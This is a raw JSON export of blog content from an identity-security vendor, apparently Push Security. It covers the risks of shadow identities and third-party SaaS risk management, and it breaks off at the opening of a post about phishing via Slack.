public data breach. Attackers often attempt to gain access to accounts using leaked passwords. This attack is called “credential stuffing.”",[],{},{"nodeType":254,"data":273855,"content":273856},{},[273857],{"nodeType":178,"data":273858,"content":273859},{},[273860,273865],{"nodeType":173,"value":273861,"marks":273862,"data":273864},"Reused passwords",[273863],{"type":370},{},{"nodeType":173,"value":273866,"marks":273867,"data":273868}," - the password set is used across other identities. This means that if an attacker got access to one password (via phishing or other means), they would be able to access more than one identity or app.",[],{},{"nodeType":254,"data":273870,"content":273871},{},[273872],{"nodeType":178,"data":273873,"content":273874},{},[273875,273880],{"nodeType":173,"value":273876,"marks":273877,"data":273879},"No MFA",[273878],{"type":370},{},{"nodeType":173,"value":273881,"marks":273882,"data":273883}," - no multifactor authentication is enabled on the account. This means that any of the above problems could lead to a direct compromise without any additional hindrances.",[],{},{"nodeType":254,"data":273885,"content":273886},{},[273887],{"nodeType":178,"data":273888,"content":273889},{},[273890,273895],{"nodeType":173,"value":273891,"marks":273892,"data":273894},"No authentication logs ",[273893],{"type":370},{},{"nodeType":173,"value":273896,"marks":273897,"data":273898},"- on centralized identities, it’s possible to see the app an identity was used on, the geographical location of the user and even the device. Contextual information like this would obviously not be available to the security/IT team for a shadow identity, so detecting compromises from unusual or suspicious activity is not possible.",[],{},{"nodeType":169,"data":273900,"content":273901},{},[273902],{"nodeType":173,"value":273903,"marks":273904,"data":273905},"Managing shadow identity and shadow cloud identity risk ",[],{},{"nodeType":312,"data":273907,"content":273911},{"target":273908},{"sys":273909},{"id":273910,"type":317,"linkType":318},"34SORjKga52MSgBaZddxGJ",[],{"nodeType":235,"data":273913,"content":273914},{},[273915],{"nodeType":173,"value":273916,"marks":273917,"data":273918},"Get visibility to bring identities out of the shadows",[],{},{"nodeType":178,"data":273920,"content":273921},{},[273922],{"nodeType":173,"value":273923,"marks":273924,"data":273925},"This goes for existing identities or new ones being created. Having visibility is the first step - nothing can be secured if neither security nor IT can see them. Visibility allows organizations to start managing the risks these identities introduce.",[],{},{"nodeType":178,"data":273927,"content":273928},{},[273929,273933,273943],{"nodeType":173,"value":273930,"marks":273931,"data":273932},"We think the best source of discovering identities is a browser extension. Read ",[],{},{"nodeType":1698,"data":273934,"content":273938},{"target":273935},{"sys":273936},{"id":273937,"type":317,"linkType":318},"19dT3oWX2H3EYtZIT3J5UO",[273939],{"nodeType":173,"value":273940,"marks":273941,"data":273942},"our post ",[],{},{"nodeType":173,"value":273944,"marks":273945,"data":273946},"on the pros and cons of this approach. ",[],{},{"nodeType":235,"data":273948,"content":273949},{},[273950],{"nodeType":173,"value":273951,"marks":273952,"data":273953},"Centralize identities as far as possible",[],{},{"nodeType":178,"data":273955,"content":273956},{},[273957],{"nodeType":173,"value":273958,"marks":273959,"data":273960},"The ideal number of identities per employee is 1. However, there are quite a few reasons why this will not be possible. Here’s just a few:",[],{},{"nodeType":250,"data":273962,"content":273963},{},[273964,273974],{"nodeType":254,"data":273965,"content":273966},{},[273967],{"nodeType":178,"data":273968,"content":273969},{},[273970],{"nodeType":173,"value":273971,"marks":273972,"data":273973},"SSO tax - a practice where vendors put SSO support as part of their “Enterprise” tiers which are a lot more expensive (and usually bundled with unneeded features)",[],{},{"nodeType":254,"data":273975,"content":273976},{},[273977],{"nodeType":178,"data":273978,"content":273979},{},[273980],{"nodeType":173,"value":273981,"marks":273982,"data":273983},"Lack of support - our research shows that 69% of the top 500 apps don’t even offer SAML SSO support at any license tier.",[],{},{"nodeType":178,"data":273985,"content":273986},{},[273987,273991,274001],{"nodeType":173,"value":273988,"marks":273989,"data":273990},"On apps where SAML SSO support is not possible, we encourage organizations to make use of OIDC logins (“Login with Google” for Google Workspace customers). This lacks some of the manageability of SAML, but still makes use of the company’s Google identity - which is MUCH better than creating a new local identity using a password. We’ve written about this in more detail ",[],{},{"nodeType":1698,"data":273992,"content":273996},{"target":273993},{"sys":273994},{"id":273995,"type":317,"linkType":318},"1pbtctbbJRqLuz8dOsecOt",[273997],{"nodeType":173,"value":28052,"marks":273998,"data":274000},[273999],{"type":194},{},{"nodeType":173,"value":274002,"marks":274003,"data":274004},". Centralizing identities is an essential part of a good IAM governance and compliance initiative.",[],{},{"nodeType":235,"data":274006,"content":274007},{},[274008],{"nodeType":173,"value":274009,"marks":274010,"data":274011},"If centralizing isn’t an option, secure them",[],{},{"nodeType":178,"data":274013,"content":274014},{},[274015],{"nodeType":173,"value":274016,"marks":274017,"data":274018},"If security teams can’t use a centralized identity for whatever reason, ensure the newly created one is secured to reduce risk. To do this:",[],{},{"nodeType":250,"data":274020,"content":274021},{},[274022,274032,274042],{"nodeType":254,"data":274023,"content":274024},{},[274025],{"nodeType":178,"data":274026,"content":274027},{},[274028],{"nodeType":173,"value":274029,"marks":274030,"data":274031},"Use a strong, unique password stored in a password manager",[],{},{"nodeType":254,"data":274033,"content":274034},{},[274035],{"nodeType":178,"data":274036,"content":274037},{},[274038],{"nodeType":173,"value":274039,"marks":274040,"data":274041},"Enable MFA. Bonus points for a strong method like WebAuthn (if you have a Mac, look at that lovely fingerprint reader). TOTP is still totally fine.",[],{},{"nodeType":254,"data":274043,"content":274044},{},[274045],{"nodeType":178,"data":274046,"content":274047},{},[274048],{"nodeType":173,"value":274049,"marks":274050,"data":274051},"Engage directly with employees to help them do the above. We recommend that this process be automated to make it manageable for security and IT teams. For example:",[],{},{"nodeType":312,"data":274053,"content":274057},{"target":274054},{"sys":274055},{"id":274056,"type":317,"linkType":318},"6LlNqtWam4jtXbxMcEbabB",[],{"nodeType":235,"data":274059,"content":274060},{},[274061],{"nodeType":173,"value":274062,"marks":274063,"data":274064},"Keep authentication logs centrally",[],{},{"nodeType":178,"data":274066,"content":274067},{},[274068,274072,274082],{"nodeType":173,"value":274069,"marks":274070,"data":274071},"The ability to see what app a user has logged into, from which device and location is invaluable during an incident. Identity providers allow security teams to stream logs to their favorite security analytics tools, but identities outside of it will not be possible to monitor. Unless Security have a separate data source that allows them to see authentication activity (I’m looking at you, ",[],{},{"nodeType":1698,"data":274073,"content":274076},{"target":274074},{"sys":274075},{"id":273937,"type":317,"linkType":318},[274077],{"nodeType":173,"value":274078,"marks":274079,"data":274081},"browser extension",[274080],{"type":194},{},{"nodeType":173,"value":60235,"marks":274083,"data":274084},[],{},{"nodeType":178,"data":274086,"content":274087},{},[274088],{"nodeType":173,"value":274089,"marks":274090,"data":274091},"Expanding coverage to shadow identities will allow organizations to expand their monitoring use cases and better cover risks on apps that can’t be hooked into SSO. This will also go a long way in helping with compliance and IAM governance, so it’s a win-win.",[],{},{"nodeType":235,"data":274093,"content":274094},{},[274095],{"nodeType":173,"value":274096,"marks":274097,"data":274098},"Have an incident response plan ",[],{},{"nodeType":178,"data":274100,"content":274101},{},[274102,274106,274117],{"nodeType":173,"value":274103,"marks":274104,"data":274105},"Develop a comprehensive incident response (IR) plan that outlines steps to take if a shadow identity has been compromised. This will help Security respond swiftly and mitigate damage. Here’s ",[],{},{"nodeType":1698,"data":274107,"content":274111},{"target":274108},{"sys":274109},{"id":274110,"type":317,"linkType":318},"14NiRrBrLFVkR8h05RCD7F",[274112],{"nodeType":173,"value":274113,"marks":274114,"data":274116},"some guidance",[274115],{"type":194},{},{"nodeType":173,"value":274118,"marks":274119,"data":274120}," on how to create one for SaaS accounts. ",[],{},{"nodeType":169,"data":274122,"content":274123},{},[274124],{"nodeType":173,"value":40632,"marks":274125,"data":274126},[],{},{"nodeType":178,"data":274128,"content":274129},{},[274130],{"nodeType":173,"value":274131,"marks":274132,"data":274133},"Shadow identities and shadow cloud identities are a risk to the business simply because they’re unknown to the security/IT team. If these groups lack visibility on identities outside of their main identity provider, their impact on the company’s overall security posture is unknown. ",[],{},{"nodeType":178,"data":274135,"content":274136},{},[274137],{"nodeType":173,"value":274138,"marks":274139,"data":274140},"However, once spotted using the right data source, identities and accounts that were previously unknown can be monitored just like any other asset.",[],{},{"nodeType":178,"data":274142,"content":274143},{},[274144],{"nodeType":173,"value":274145,"marks":274146,"data":274147},"By understanding what shadow identities are and implementing proactive security measures, security teams can minimize the risks they pose to their organizations and customers.",[],{},"Get out of the dark: Manage the risk of shadow identities","Employees sign up to cloud apps on their own every day. Each time, they create a new account and a new identity on that app. How do you find and secure them?","2023-09-19T00:00:00.000Z","what-are-shadow-identities",{"items":274153},[274154,274158],{"sys":274155,"name":274157},{"id":274156},"3SA5H01UkKauuiTdt0KC6q","Shadow IT",{"sys":274159,"name":26133},{"id":26132},{"items":274161},[274162],{"fullName":274163,"firstName":274164,"jobTitle":274165,"profilePicture":274166},"Tyrone Erasmus","Tyrone","Co-founder / CTO",{"url":274167},"https://images.ctfassets.net/y1cdw1ablpvd/5rkMblymL7lG4pZBiYzWo6/26f0da21be8fc252b13b62aacc22d19d/Push_Founders_at_Cahoots_October_28_2022_by_Doug_Coombe-22.jpg",{"items":274169},[274170],{"fullName":273632,"firstName":273633,"jobTitle":273634,"profilePicture":274171},{"url":273636},{"json":274173,"links":274665},{"nodeType":165,"data":274174,"content":274175},{},[274176,274182,274189,274196,274203,274209,274216,274308,274313,274320,274428,274435,274442,274449,274456,274463,274470,274477,274484,274491,274498,274505,274512,274519,274524,274531,274537,274543,274550,274557,274605,274610,274616,274623,274628,274635,274642,274649],{"nodeType":169,"data":274177,"content":274178},{},[274179],{"nodeType":173,"value":258287,"marks":274180,"data":274181},[],{},{"nodeType":178,"data":274183,"content":274184},{},[274185],{"nodeType":173,"value":274186,"marks":274187,"data":274188},"Companies often rely on third-party relationships to improve their operational efficiency and expand their capabilities. While these partnerships can bring numerous benefits, they also introduce a critical element of risk. Organizations often employ a strategic approach known as \"Third-Party Risk Management\"(TPRM) to try to manage third-party risk. In this article, we'll delve into the concept of third-party risk management at a high level, highlighting its importance and key components.",[],{},{"nodeType":178,"data":274190,"content":274191},{},[274192],{"nodeType":173,"value":274193,"marks":274194,"data":274195},"We’ll also explore alternative approaches that can help manage third-party risk, which may not yet be on your radar.",[],{},{"nodeType":169,"data":274197,"content":274198},{},[274199],{"nodeType":173,"value":274200,"marks":274201,"data":274202},"What is Third-Party Risk Management?",[],{},{"nodeType":178,"data":274204,"content":274205},{},[274206],{"nodeType":173,"value":273215,"marks":274207,"data":274208},[],{},{"nodeType":169,"data":274210,"content":274211},{},[274212],{"nodeType":173,"value":274213,"marks":274214,"data":274215},"Why is TPRM Important?",[],{},{"nodeType":250,"data":274217,"content":274218},{},[274219,274234,274249,274264,274274,274293],{"nodeType":254,"data":274220,"content":274221},{},[274222],{"nodeType":178,"data":274223,"content":274224},{},[274225,274230],{"nodeType":173,"value":274226,"marks":274227,"data":274229},"Protecting Reputation",[274228],{"type":370},{},{"nodeType":173,"value":274231,"marks":274232,"data":274233},": A third-party's failure to protect your data and meet agreed-upon standards can tarnish your company image and brand, potentially leading to a loss of trust among customers, stakeholders, and the public.",[],{},{"nodeType":254,"data":274235,"content":274236},{},[274237],{"nodeType":178,"data":274238,"content":274239},{},[274240,274245],{"nodeType":173,"value":274241,"marks":274242,"data":274244},"Compliance",[274243],{"type":370},{},{"nodeType":173,"value":274246,"marks":274247,"data":274248},": Regulatory bodies worldwide have heightened their scrutiny of third-party relationships. If both parties don’t comply with these regulations, they may have to pay hefty fines and face legal consequences. TPRM is meant to ensure adherence to these legal requirements.",[],{},{"nodeType":254,"data":274250,"content":274251},{},[274252],{"nodeType":178,"data":274253,"content":274254},{},[274255,274260],{"nodeType":173,"value":274256,"marks":274257,"data":274259},"Data Security",[274258],{"type":370},{},{"nodeType":173,"value":274261,"marks":274262,"data":274263},": Third-party partners, applications, and services often have access to sensitive data, so it’s crucial that they follow standard security measures and adhere to data compliance regulations. ",[],{},{"nodeType":254,"data":274265,"content":274266},{},[274267],{"nodeType":178,"data":274268,"content":274269},{},[274270],{"nodeType":173,"value":274271,"marks":274272,"data":274273},"In the case of third-party applications, even if they don’t have direct access to company data, they may have access to it depending on what permissions were granted to the app upon sign up. ",[],{},{"nodeType":254,"data":274275,"content":274276},{},[274277],{"nodeType":178,"data":274278,"content":274279},{},[274280,274284,274289],{"nodeType":173,"value":274281,"marks":274282,"data":274283},"You may not also realize that even if an application doesn’t contain data you consider ",[],{},{"nodeType":173,"value":274285,"marks":274286,"data":274288},"sensitive",[274287],{"type":1646},{},{"nodeType":173,"value":274290,"marks":274291,"data":274292}," or high-risk, the app itself can be used by an attacker to gain access to that sensitive data stored elsewhere in your systems.",[],{},{"nodeType":254,"data":274294,"content":274295},{},[274296],{"nodeType":178,"data":274297,"content":274298},{},[274299,274304],{"nodeType":173,"value":274300,"marks":274301,"data":274303},"Operational Resilience",[274302],{"type":370},{},{"nodeType":173,"value":274305,"marks":274306,"data":274307},": If a critical third-party vendor experiences disruptions, your whole business can be disrupted. TPRM helps mitigate this risk by identifying potential vulnerabilities and developing contingency plans.",[],{},{"nodeType":312,"data":274309,"content":274312},{"target":274310},{"sys":274311},{"id":169040,"type":317,"linkType":318},[],{"nodeType":169,"data":274314,"content":274315},{},[274316],{"nodeType":173,"value":274317,"marks":274318,"data":274319},"Key Components of Third-Party Risk Management",[],{},{"nodeType":250,"data":274321,"content":274322},{},[274323,274338,274353,274368,274383,274398,274413],{"nodeType":254,"data":274324,"content":274325},{},[274326],{"nodeType":178,"data":274327,"content":274328},{},[274329,274334],{"nodeType":173,"value":274330,"marks":274331,"data":274333},"Identification",[274332],{"type":370},{},{"nodeType":173,"value":274335,"marks":274336,"data":274337},": The first step in TPRM is identifying all third-party relationships within the organization. This includes both existing and potential partnerships.",[],{},{"nodeType":254,"data":274339,"content":274340},{},[274341],{"nodeType":178,"data":274342,"content":274343},{},[274344,274349],{"nodeType":173,"value":274345,"marks":274346,"data":274348},"Risk Assessment",[274347],{"type":370},{},{"nodeType":173,"value":274350,"marks":274351,"data":274352},": Each third-party is assessed for various risks, including financial, operational, compliance, and reputational risks. This process helps prioritize risk mitigation efforts.",[],{},{"nodeType":254,"data":274354,"content":274355},{},[274356],{"nodeType":178,"data":274357,"content":274358},{},[274359,274364],{"nodeType":173,"value":274360,"marks":274361,"data":274363},"Due Diligence",[274362],{"type":370},{},{"nodeType":173,"value":274365,"marks":274366,"data":274367},": Due diligence involves conducting background checks, audits, and reviews to gather information about a third-party's history, financial stability, and adherence to industry standards.",[],{},{"nodeType":254,"data":274369,"content":274370},{},[274371],{"nodeType":178,"data":274372,"content":274373},{},[274374,274379],{"nodeType":173,"value":274375,"marks":274376,"data":274378},"Contractual Agreements",[274377],{"type":370},{},{"nodeType":173,"value":274380,"marks":274381,"data":274382},": Contracts with third parties should clearly define roles, responsibilities, and expectations, including risk-sharing agreements and penalties for non-compliance.",[],{},{"nodeType":254,"data":274384,"content":274385},{},[274386],{"nodeType":178,"data":274387,"content":274388},{},[274389,274394],{"nodeType":173,"value":274390,"marks":274391,"data":274393},"Monitoring and Reporting",[274392],{"type":370},{},{"nodeType":173,"value":274395,"marks":274396,"data":274397},": Continuous monitoring of third-party activities is essential. Any deviations from agreed-upon standards or indicators of potential risks should be reported promptly.",[],{},{"nodeType":254,"data":274399,"content":274400},{},[274401],{"nodeType":178,"data":274402,"content":274403},{},[274404,274409],{"nodeType":173,"value":274405,"marks":274406,"data":274408},"Risk Mitigation Strategies",[274407],{"type":370},{},{"nodeType":173,"value":274410,"marks":274411,"data":274412},": Based on risk assessments, organizations should develop mitigation strategies that may include risk transfer, contingency plans, or risk-sharing mechanisms.",[],{},{"nodeType":254,"data":274414,"content":274415},{},[274416],{"nodeType":178,"data":274417,"content":274418},{},[274419,274424],{"nodeType":173,"value":274420,"marks":274421,"data":274423},"Exit Strategy",[274422],{"type":370},{},{"nodeType":173,"value":274425,"marks":274426,"data":274427},": You need to plan for the termination of a third-party relationship, which should include data retrieval, transitioning responsibilities, and ensuring minimal disruption to operations.",[],{},{"nodeType":178,"data":274429,"content":274430},{},[274431],{"nodeType":173,"value":274432,"marks":274433,"data":274434},"You can see why these TPRM strategies are so important! Since they’re so critical from an IT and Security perspective, a good TPRM strategy will also benefit from treating each third-party commodity separately. ",[],{},{"nodeType":178,"data":274436,"content":274437},{},[274438],{"nodeType":173,"value":274439,"marks":274440,"data":274441},"Take, for example, a third-party technology partner. You may have a TPRM strategy specifically for this group, which focuses on all those elements listed above. \n\nBut one specific third-party “group” to consider focusing on as party of your TPRM plan is SaaS and identity security. ",[],{},{"nodeType":169,"data":274443,"content":274444},{},[274445],{"nodeType":173,"value":274446,"marks":274447,"data":274448},"Ensure your TPRM strategy can keep up with the explosion of third-party cloud services",[],{},{"nodeType":178,"data":274450,"content":274451},{},[274452],{"nodeType":173,"value":274453,"marks":274454,"data":274455},"Now that most companies are reliant on third-party cloud and SaaS applications to operate efficiently, TPRM strategies must include solutions that focus on reducing the risk of those third-party apps and identities. So, in addition to the governance risk and compliance (GRC) tools you’re using as part of your TPRM strategy, you should strongly consider how this fits into your overall cloud security strategy. \n\nTo manage third-party cloud services, you’ll likely first encounter solutions lumped into a few categories, including cloud access security brokers (CASBs), SaaS security posture management (SSPMs), and cloud security posture management (CSPMs). ",[],{},{"nodeType":178,"data":274457,"content":274458},{},[274459],{"nodeType":173,"value":274460,"marks":274461,"data":274462},"In this section, we’ll be discussing third-party risk specifically when it comes to SaaS and the integrations that are added to core SaaS platforms. Note that some call these SaaS integrations “fourth-party risk,” but we think the risk can be managed similarly across both types of SaaS apps, so we’re going to talk about both. ",[],{},{"nodeType":235,"data":274464,"content":274465},{},[274466],{"nodeType":173,"value":274467,"marks":274468,"data":274469},"What is SaaS third-party risk? ",[],{},{"nodeType":178,"data":274471,"content":274472},{},[274473],{"nodeType":173,"value":274474,"marks":274475,"data":274476},"SaaS third-party risk refers to the potential dangers and vulnerabilities associated with using third-party SaaS providers for software and services in terms of security, compliance, and operational continuity.",[],{},{"nodeType":235,"data":274478,"content":274479},{},[274480],{"nodeType":173,"value":274481,"marks":274482,"data":274483},"Why does it deserve special attention in your TPRM program?",[],{},{"nodeType":178,"data":274485,"content":274486},{},[274487],{"nodeType":173,"value":274488,"marks":274489,"data":274490},"Due to the scale and expansion of how many SaaS apps are used within a business. SaaS has exploded, with new apps hitting the market every day, and employees continue to self-adopt SaaS apps that have the features and functionality they need to do their jobs and make things easier. The trouble is that in order to work, most SaaS apps require access to other business apps, company data, or employee/user data to work. ",[],{},{"nodeType":178,"data":274492,"content":274493},{},[274494],{"nodeType":173,"value":274495,"marks":274496,"data":274497},"With employees self-adopting apps for work all the time, IT and Security are left trying to manage the risk without even having visibility into what apps and identities are being created.",[],{},{"nodeType":178,"data":274499,"content":274500},{},[274501],{"nodeType":173,"value":274502,"marks":274503,"data":274504},"So, the first step is getting that visibility so you know which third-parties to focus on, what data they have access to, and if they’re doing anything that might indicate that they’re malicious or simply too high risk for the company.",[],{},{"nodeType":169,"data":274506,"content":274507},{},[274508],{"nodeType":173,"value":274509,"marks":274510,"data":274511},"Push provides visibility into all third-party cloud services employees are using and creating",[],{},{"nodeType":178,"data":274513,"content":274514},{},[274515],{"nodeType":173,"value":274516,"marks":274517,"data":274518},"Push uses data from our browser extension to find SaaS apps that employees sign  \ninto with usernames and passwords and SSO (OIDC). This gives you complete visibility of \nyour SaaS environment, including shadow SaaS apps and cloud accounts that aren’t \nmanaged by IT. ",[],{},{"nodeType":312,"data":274520,"content":274523},{"target":274521},{"sys":274522},{"id":273329,"type":317,"linkType":318},[],{"nodeType":235,"data":274525,"content":274526},{},[274527],{"nodeType":173,"value":274528,"marks":274529,"data":274530},"Detect the new apps, integrations and identities in real time",[],{},{"nodeType":178,"data":274532,"content":274533},{},[274534],{"nodeType":173,"value":273342,"marks":274535,"data":274536},[],{},{"nodeType":312,"data":274538,"content":274542},{"target":274539},{"sys":274540},{"id":274541,"type":317,"linkType":318},"1hqMZl60NhvhHIfnO7FttV",[],{"nodeType":235,"data":274544,"content":274545},{},[274546],{"nodeType":173,"value":274547,"marks":274548,"data":274549},"Identify account security risks and discover shadow SaaS at the same time",[],{},{"nodeType":178,"data":274551,"content":274552},{},[274553],{"nodeType":173,"value":274554,"marks":274555,"data":274556},"Supply chain risk is important, but we’d argue the risk of identity-based attacks are greater for most organizations. 49% of the incidents in the 2023 Verizon DBIR involved credentials, and Crowdstrike have reported that 80% of the attacks they detected used identity-based attack techniques. Push can identify account security issues that make it possible for attackers to compromise your employees accounts using credential stuffing, brute forcing and consent phishing attacks. These include:",[],{},{"nodeType":250,"data":274558,"content":274559},{},[274560,274569,274578,274587,274596],{"nodeType":254,"data":274561,"content":274562},{},[274563],{"nodeType":178,"data":274564,"content":274565},{},[274566],{"nodeType":173,"value":273418,"marks":274567,"data":274568},[],{},{"nodeType":254,"data":274570,"content":274571},{},[274572],{"nodeType":178,"data":274573,"content":274574},{},[274575],{"nodeType":173,"value":273428,"marks":274576,"data":274577},[],{},{"nodeType":254,"data":274579,"content":274580},{},[274581],{"nodeType":178,"data":274582,"content":274583},{},[274584],{"nodeType":173,"value":273438,"marks":274585,"data":274586},[],{},{"nodeType":254,"data":274588,"content":274589},{},[274590],{"nodeType":178,"data":274591,"content":274592},{},[274593],{"nodeType":173,"value":273448,"marks":274594,"data":274595},[],{},{"nodeType":254,"data":274597,"content":274598},{},[274599],{"nodeType":178,"data":274600,"content":274601},{},[274602],{"nodeType":173,"value":273458,"marks":274603,"data":274604},[],{},{"nodeType":312,"data":274606,"content":274609},{"target":274607},{"sys":274608},{"id":273465,"type":317,"linkType":318},[],{"nodeType":178,"data":274611,"content":274612},{},[274613],{"nodeType":173,"value":273471,"marks":274614,"data":274615},[],{},{"nodeType":178,"data":274617,"content":274618},{},[274619],{"nodeType":173,"value":274620,"marks":274621,"data":274622},"We engage employees directly via Slack or MS Teams, explain the account security issue we’ve identified in a way they’ll understand, and guide them on how to fix it.",[],{},{"nodeType":312,"data":274624,"content":274627},{"target":274625},{"sys":274626},{"id":273485,"type":317,"linkType":318},[],{"nodeType":235,"data":274629,"content":274630},{},[274631],{"nodeType":173,"value":274632,"marks":274633,"data":274634},"Regain control of all the third-party cloud services employees sign up for on their own",[],{},{"nodeType":178,"data":274636,"content":274637},{},[274638],{"nodeType":173,"value":274639,"marks":274640,"data":274641},"By using Push, you gain complete visibility of all SaaS apps in your environment, including those adopted by employees without the oversight of IT and Security. ",[],{},{"nodeType":178,"data":274643,"content":274644},{},[274645],{"nodeType":173,"value":274646,"marks":274647,"data":274648},"We’ll automatically find the security issues that put your data at risk and guide employees to fix them. This allows you to allow app self-adoption and adopt a default allow approach that enables your business while scaling security so you don’t lose control of SaaS security risks.  ",[],{},{"nodeType":178,"data":274650,"content":274651},{},[274652,274655,274661],{"nodeType":173,"value":37,"marks":274653,"data":274654},[],{},{"nodeType":186,"data":274656,"content":274657},{"uri":473},[274658],{"nodeType":173,"value":93499,"marks":274659,"data":274660},[],{},{"nodeType":173,"value":274662,"marks":274663,"data":274664}," to find out more.",[],{},{"entries":274666},{"hyperlink":274667,"inline":274668,"block":274669},[],[],[274670,274672,274679,274685,274693],{"sys":274671,"__typename":15269,"type":112637,"ctaText":192192,"buttonLabel":192193,"buttonColour":15273,"buttonUrl":118},{"id":169040},{"sys":274673,"__typename":5345,"title":274674,"caption":274675,"layoutMode":118,"file":274676},{"id":273329},"Apps dash_PLG blog","Push dashboard of applications in use",{"url":274677,"width":5358,"height":274678},"https://images.ctfassets.net/y1cdw1ablpvd/725D6oAs9P55D6ffUZQ943/ea8128093af916eea79c13d429755f6e/image3.png",1034,{"sys":274680,"__typename":5345,"title":274681,"caption":274682,"layoutMode":112585,"file":274683},{"id":274541},"Slack message new app alert for Security team","Channel message to security team via Slack about new app ",{"url":274684,"width":5358,"height":274678},"https://images.ctfassets.net/y1cdw1ablpvd/6CKhrva6Jh3jpHfnt0Maq5/edeeac0b00f1109e8601016f5a6e0c63/image17.png",{"sys":274686,"__typename":5345,"title":274687,"caption":274688,"layoutMode":118,"file":274689},{"id":273465},"Employee identities dashboard ","Employee identities dashboard showing the security status for each account/identity",{"url":274690,"width":274691,"height":274692},"https://images.ctfassets.net/y1cdw1ablpvd/3TFVCYgvSaiUlWFamaHhCd/3a845d4c7bd69058a4fa27099dd4cc2d/image2.png",1580,945,{"sys":274694,"__typename":5345,"title":274695,"caption":274696,"layoutMode":118,"file":274697},{"id":273485},"MFA ChatOps message ","A chat message to guide an employee to turn on MFA",{"url":274698,"width":5358,"height":274678},"https://images.ctfassets.net/y1cdw1ablpvd/3C4b1X7FvwlfGnSonGC0aT/2c14caaadc2252cde79be9db059acaf2/image6.png","content:blog:third-party-risk-management.json","blog/third-party-risk-management.json","blog/third-party-risk-management",{"_path":274703,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":274704,"ogImage":118,"summary":274706,"title":265179,"subtitle":118,"metaTitle":274723,"synopsis":274724,"hashTags":118,"publishedDate":274725,"slug":265180,"tagsCollection":274726,"relatedBlogPostsCollection":274732,"authorsCollection":276648,"content":276652,"_id":277568,"_type":5439,"_source":5440,"_file":277569,"_stem":277570,"_extension":5439},"/blog/phishing-slack-persistence",{"id":264515,"publishedAt":274705},"2024-03-21T08:56:58.679Z",{"json":274707},{"data":274708,"content":274709,"nodeType":165},{},[274710,274717],{"data":274711,"content":274712,"nodeType":178},{},[274713],{"data":274714,"marks":274715,"value":274716,"nodeType":173},{},[],"In this post, we're going to demonstrate how an attacker who has gained a foothold by compromising a Slack user account can leverage that to maintain persistence and also conduct more advanced social engineering attacks to move laterally.",{"data":274718,"content":274719,"nodeType":178},{},[274720],{"data":274721,"marks":274722,"value":13836,"nodeType":173},{},[],"Phishing Slack for persistence and lateral movement","In this post, we're going to demonstrate how to phish via Slack to gain persistence and move laterally. ","2023-10-24T00:00:00.000Z",{"items":274727},[274728,274730],{"sys":274729,"name":505},{"id":504},{"sys":274731,"name":26137},{"id":26136},{"items":274733},[274734,275471,276242],{"__typename":1528,"sys":274735,"content":274736,"title":252410,"synopsis":275460,"hashTags":118,"publishedDate":274725,"slug":252411,"tagsCollection":275461,"authorsCollection":275467},{"id":236132},{"json":274737},{"data":274738,"content":274739,"nodeType":165},{},[274740,274770,274777,274818,274825,274844,274850,274856,274862,274868,274874,274904,274910,274946,274953,274958,274964,274970,274976,274982,274989,274995,275002,275009,275016,275023,275029,275036,275043,275050,275057,275064,275070,275076,275083,275089,275109,275115,275121,275128,275135,275141,275147,275154,275160,275167,275174,275181,275187,275194,275200,275207,275214,275222,275234,275240,275247,275253,275259,275265,275272,275279,275286,275293,275300,275306,275313,275319,275326,275332,275339,275345,275351,275357,275398,275404,275410,275416,275423,275430,275449,275454],{"data":274741,"content":274742,"nodeType":178},{},[274743,274747,274754,274757,274767],{"data":274744,"marks":274745,"value":274746,"nodeType":173},{},[],"This is the third post in a series on attack chains formed by combining techniques in the ",{"data":274748,"content":274749,"nodeType":186},{"uri":88239},[274750],{"data":274751,"marks":274752,"value":88742,"nodeType":173},{},[274753],{"type":194},{"data":274755,"marks":274756,"value":267913,"nodeType":173},{},[],{"data":274758,"content":274761,"nodeType":1698},{"target":274759},{"sys":274760},{"id":267879,"type":317,"linkType":318},[274762],{"data":274763,"marks":274764,"value":274766,"nodeType":173},{},[274765],{"type":194},"shadow workflows and evil twin integrations.",{"data":274768,"marks":274769,"value":37,"nodeType":173},{},[],{"data":274771,"content":274772,"nodeType":178},{},[274773],{"data":274774,"marks":274775,"value":274776,"nodeType":173},{},[],"In this article, we’ll demonstrate how instant messaging applications are an increasingly attractive target for a range of phishing and social engineering attacks. We’ll use the following SaaS attack techniques chained together:",{"data":274778,"content":274779,"nodeType":250},{},[274780,274799],{"data":274781,"content":274782,"nodeType":254},{},[274783],{"data":274784,"content":274785,"nodeType":178},{},[274786,274789,274796],{"data":274787,"marks":274788,"value":37,"nodeType":173},{},[],{"data":274790,"content":274791,"nodeType":186},{"uri":197770},[274792],{"data":274793,"marks":274794,"value":264557,"nodeType":173},{},[274795],{"type":194},{"data":274797,"marks":274798,"value":37,"nodeType":173},{},[],{"data":274800,"content":274801,"nodeType":254},{},[274802],{"data":274803,"content":274804,"nodeType":178},{},[274805,274808,274815],{"data":274806,"marks":274807,"value":37,"nodeType":173},{},[],{"data":274809,"content":274810,"nodeType":186},{"uri":208435},[274811],{"data":274812,"marks":274813,"value":264576,"nodeType":173},{},[274814],{"type":194},{"data":274816,"marks":274817,"value":37,"nodeType":173},{},[],{"data":274819,"content":274820,"nodeType":178},{},[274821],{"data":274822,"marks":274823,"value":274824,"nodeType":173},{},[],"We’ll use Slack as our primary example in this case and we’ll be primarily focused on external phishing as part of the initial access phase of the kill chain. ",{"data":274826,"content":274827,"nodeType":178},{},[274828,274831,274840],{"data":274829,"marks":274830,"value":273719,"nodeType":173},{},[],{"data":274832,"content":274835,"nodeType":1698},{"target":274833},{"sys":274834},{"id":264515,"type":317,"linkType":318},[274836],{"data":274837,"marks":274838,"value":274839,"nodeType":173},{},[],"companion article",{"data":274841,"marks":274842,"value":274843,"nodeType":173},{},[],", we’ll look at how once an attacker has a foothold on Slack, new attack possibilities open up that allow for persistence and lateral movement to be 